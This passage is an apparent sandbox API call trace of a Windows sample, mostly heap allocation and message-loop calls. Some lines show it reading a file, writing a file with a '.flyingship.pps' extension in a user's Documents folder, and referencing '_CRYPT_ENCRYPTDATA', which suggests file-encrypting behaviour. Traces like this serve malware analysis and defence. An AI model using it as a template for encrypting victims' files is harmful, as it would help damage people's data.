lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.270] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0178.270] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0178.270] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0178.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0178.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0178.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0178.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0178.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0178.272] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0178.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\isutz.flyingship.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0178.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0178.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0178.297] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0178.298] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0178.299] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x9094, lpOverlapped=0x0) returned 1 [0178.302] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0178.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9094) returned 0xbea018 [0178.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0178.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9094) returned 0xbf30b8 [0178.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.304] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0178.304] TranslateMessage (lpMsg=0x87f36c) returned 0 [0178.304] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0178.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.304] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.305] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0178.305] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0178.305] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9094) returned 0xbea018 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0178.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.305] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0178.306] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.306] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0178.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9094) returned 0xbea018 [0178.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0178.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0178.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9094) returned 0xbfc158 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.308] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0178.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0178.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0178.309] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0178.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.309] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0178.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2808 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 